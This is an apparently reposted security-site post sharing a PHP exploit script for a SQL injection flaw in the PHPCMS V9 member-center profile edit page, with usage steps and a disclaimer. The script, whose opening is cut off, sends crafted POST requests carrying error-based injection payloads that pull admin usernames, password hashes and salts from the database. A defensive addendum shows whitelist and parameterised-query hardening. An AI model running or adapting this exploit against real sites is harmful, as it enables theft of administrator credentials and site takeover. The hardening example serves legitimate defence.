The member profile edit page in the PHPCMS V9 member center does not properly handle input, leading to a SQL injection vulnerability. It seems to have been posted first on T00LS and later reposted to WooYun. The vendor has already patched it, so users of this CMS should upgrade as soon as possible. Many experts probably already have an exploit, but nobody has posted one. I have only just started learning PHP and wrote this as practice; it still has some small problems, and I hope the experts can help improve it.
Usage:
1. First register a member account, log in to obtain the cookie, put it into the cookie variable, and then run the script.
2. If some people get no data back, change the UserAgent to your own.
The exploit code is as follows:
' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
            } else {
                echo $i . '-->' . $admin_match[1] . "\n";
            }
            //echo $admin_match[1]. "\n";
            //echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
            //echo mb_convert_encoding($admin_match[1],'gbk','auto')."\n";
        }
    }
    // foreach is faster than for
    // if (preg_match('/Duplicate/', send_pack($cmd2))) {
    //     for ($i = 0; $i < $count; $i++) {
    //         $payload = 'nickname=test&info%5Bbirthday%3D%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+distinct+concat%280x23%2Cusername%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%2C0x23%29+FROM+' . $tableadmin . '+Order+by+userid+LIMIT+' . $i . '%2C1%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%5D=2013-02-08&dosubmit=%E6%8F%90%E4%BA%A4';
    //         preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
    //         if (preg_match('/charset=utf-8/', send_pack($payload))) {
    //             echo $i . '-->' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
    //         } else {
    //             echo $i . '-->' . $admin_match[1] . "\n";
    //         }
    //     }
    // }
} else {
    exit("报告大人,网站不存在此漏洞,你可以继续秒下一个!\n");
}

// Sends one raw HTTP POST to the profile-edit action and returns the full response.
function send_pack($cmd) {
    global $host, $path, $cookie;
    $data = "POST " . $path . "/index.php?m=member&c=index&a=account_manage_info&t=1 HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Referer: http://" . $host . $path . "/index.php?m=member&c=index&a=account_manage_info&t=1\r\n";
    $data .= "Cookie: " . $cookie . "\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: " . strlen($cmd) . "\r\n\r\n";
    $data .= $cmd . "\r\n";
    $fp = @fsockopen($host, 80, $errno, $errstr, 30);
    //echo ini_get('default_socket_timeout'); // the default timeout is 60 seconds
    if (!$fp) {
        echo $errno . '-->' . $errstr;
        exit('Could not connect to: ' . $host);
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}

// Timing helper
function func_time() {
    list($microsec, $sec) = explode(' ', microtime());
    return $microsec + $sec;
}

echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒';
?>
From www.waitalone.cn. Thanks for it.
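The root cause visible in the payload above is that the key of the `info[...]` array (`birthday=(select ...)`) reaches the SQL statement as a column name. The following is an added illustration of how a profile-update handler can be hardened against that; it is not PHPCMS code, and the column names, table name and `$pdo` connection are assumed.

```php
<?php
// Added example, not PHPCMS code: only whitelisted column names may appear in
// the UPDATE, and the values are bound as parameters, never concatenated.

// Assumed (hypothetical) columns of the member-info table.
const ALLOWED_INFO_FIELDS = ['birthday', 'nickname', 'gender', 'intro'];

/**
 * Keep only keys that exactly match a known column. Anything else, such as
 * "birthday=(select ...)", is dropped and collected in $rejected for logging.
 */
function filter_info_fields(array $info, array $allowed, array &$rejected = []): array
{
    $clean = [];
    foreach ($info as $key => $value) {
        if (in_array($key, $allowed, true)) {   // strict: the key must be a fixed name
            $clean[$key] = (string) $value;
        } else {
            $rejected[] = (string) $key;
        }
    }
    return $clean;
}

/** Build a parameterised UPDATE; the column names come only from the whitelist. */
function build_update(string $table, array $clean, int $userid): array
{
    if ($clean === []) {
        return ['', []];
    }
    $sets = [];
    foreach (array_keys($clean) as $col) {
        $sets[] = "`$col` = ?";   // $col was validated in filter_info_fields()
    }
    $sql = "UPDATE `$table` SET " . implode(', ', $sets) . " WHERE `userid` = ?";
    $params = array_values($clean);
    $params[] = $userid;
    return [$sql, $params];
}

// Constructed input with the same shape as the request in the post above.
$posted = ['nickname' => 'test', 'birthday=(select 1)' => '2013-02-08'];
$rejected = [];
$clean = filter_info_fields($posted, ALLOWED_INFO_FIELDS, $rejected);
[$sql, $params] = build_update('member_info', $clean, 42);
// $sql is now "UPDATE `member_info` SET `nickname` = ? WHERE `userid` = ?"
// and $rejected contains the injected key, which should be logged as an attack attempt.
// With an assumed PDO connection: $pdo->prepare($sql)->execute($params);
```

Logging the contents of `$rejected` gives a simple detection signal: a profile update whose field names are not in the whitelist is a probe against exactly this flaw.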
Disclaimer: The programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site accepts no legal or joint liability. If you have questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).